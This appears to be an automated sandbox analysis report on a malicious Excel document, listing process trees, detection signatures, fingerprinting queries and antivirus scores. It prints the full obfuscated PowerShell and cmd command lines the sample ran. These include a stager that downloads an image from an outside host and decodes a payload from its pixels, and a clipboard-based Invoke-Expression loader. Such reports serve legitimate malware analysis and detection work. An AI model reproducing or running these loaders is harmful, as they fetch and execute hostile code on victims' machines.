Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte & (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /V:ON/C'set d0=rMc5( ''Fj$hEJOYU2uwf=ip7CGdI-klmngTR,H34/^|B]Lbs'o%AXvy1[V_0{D;+:}*^&x\aPSW6^^9`etK).N&&for %x in (12,2,11,14,5,5,5,75,75,75,67,4,7,60,17,65,60,55,65,60,59,65,7,5,29,20,5,48,12,1,48,37,48,28,35,48,37,48,72,12,35,29,48,81,5,5,4,7,60,55,65,60,17,65,60,59,65,7,5,29,20,48,17,27,26,48,37,48,53,51,48,37,48,0,22,70,46,31,78,64,48,81,5,5,4,5,5,56,35,54,71,12,44,4,7,60,59,65,60,55,65,7,29,8,5,48,1,51,35,48,37,48,38,48,81,5,5,81,62,5,5,82,4,7,60,59,65,60,55,65,60,17,65,7,5,29,20,5,48,47,12,48,37,48,79,29,48,37,48,22,79,12,1,48,81,5,5,4,7,60,55,65,60,59,65,60,17,65,60,40,65,60,39,65,7,29,20,5,48,70,48,37,48,53,70,0,22,48,37,48,43,48,37,48,27,26,83,57,48,37,48,31,12,64,48,81,5,4,5,56,35,54,71,12,44,4,7,60,40,65,60,55,65,60,59,65,60,39,65,60,17,65,7,5,29,8,5,48,82,12,83,25,48,37,48,12,32,82,35,78,52,35,48,37,48,33,26,48,37,48,14,27,22,48,37,48,47,54,47,35,48,81,5,5,81,5,5,62,5,5,75,75,75,67,4,7,60,59,65,60,55,65,7,5,29,20,5,48,47,48,37,48,70,31,48,81,5,4,48,70,48,81,5,4,7,60,Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /CEchO ^^^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^^^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^^^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^^^|^^^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15)*16)-bor(${P}.'G' -baJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EchO ^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^|^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /C poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte ^& (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte & (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )

Language, Device and Operating System Detection:

barindex
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 87288 Sample: 634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xls Startdate: 31/10/2018 Architecture: WINDOWS Score: 64 27 Multi AV Scanner detection for submitted file 2->27 29 Obfuscated command line found 2->29 31 Very long command line found 2->31 33 PowerShell case anomaly found 2->33 9 EXCEL.EXE 39 18 2->9         started        process3 signatures4 37 Obfuscated command line found 9->37 39 Very long command line found 9->39 41 Document exploit detected (process start blacklist hit) 9->41 12 cmd.exe 9->12         started        process5 signatures6 43 Obfuscated command line found 12->43 45 PowerShell case anomaly found 12->45 15 cmd.exe 12->15         started        process7 signatures8 47 Obfuscated command line found 15->47 49 PowerShell case anomaly found 15->49 18 cmd.exe 15->18         started        21 cmd.exe 15->21         started        23 clip.exe 15->23         started        process9 signatures10 35 PowerShell case anomaly found 18->35 25 powershell.exe 18->25         started        process11

Simulations

Behavior and APIs

TimeTypeDescription
08:09:42API Interceptor3x Sleep call for process: EXCEL.EXE modified
08:09:53API Interceptor1x Sleep call for process: clip.exe modified
08:09:55API Interceptor1x Sleep call for process: powershell.exe modified

Antivirus Detection

Initial Sample

SourceDetectionScannerLabelLink
634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xls34%virustotalBrowse
634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xls9%metadefenderBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthor
00000008.00000002.1587961229.018E0000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000006.00000002.1575622489.003C0000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000006.00000000.1573363401.00010000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000006.00000000.1575210257.00010000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000006.00000000.1574110051.00010000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000008.00000002.1586592723.01250000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000006.00000003.1575306060.00010000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000006.00000000.1574574233.00010000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000006.00000002.1575587396.00150000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.